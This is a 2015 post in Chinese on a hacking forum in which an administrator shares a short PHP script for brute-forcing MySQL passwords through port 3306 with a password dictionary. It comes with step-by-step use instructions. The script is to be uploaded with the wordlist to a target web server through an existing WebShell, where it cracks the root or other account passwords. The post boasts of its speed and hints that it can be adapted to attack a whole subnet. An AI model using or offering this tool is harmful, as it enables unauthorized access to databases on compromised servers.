搜索
查看: 618|回复: 0

PHP Mysql 密码暴力破解,本机暴力破解 3306 端口,源码

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-6-12 09:10:27 | 显示全部楼层 |阅读模式
  1. <?
  2. set_time_limit(0);                                   //脚本不超时

  3. $ip = "localhost";                                   //IP
  4. $user = "root";                                      //用户名
  5. $passwd = file("password.txt");                      //密码字典

  6. for($i=0; $i<count($passwd); $i++){
  7.     $pass = Str_Replace("\r\n", "", $passwd[$i]);   //剔除多余的回车+换行
  8.     connect($user, $pass);
  9.     flush();
  10. }
  11. echo "扫描结束!";

  12. function connect($user, $pass) {
  13.     if(@mysql_connect($ip, $user, $pass)){
  14.         echo "<font color='#0000FF'><b>得到密码:<font color='#FF0000'>".$pass."</font>!!!</b></font>";
  15.         exit();
  16.     }
  17.     else {
  18.         echo $pass.'<br>';
  19.     }
  20. }
  21. ?>
复制代码


代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,有点效果,这个以前有人发过,这个是我改过的。

爆破速度奇快无比,暴力2W密码只需要十几秒,密码破解准确率达100%,稍微改一下就可以暴力整个C段的,你懂的……

用法:

1、修改 PHP 代码中的用户名与IP

2、准备字典 password.txt,每行一个,理论上支持无数行。

3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表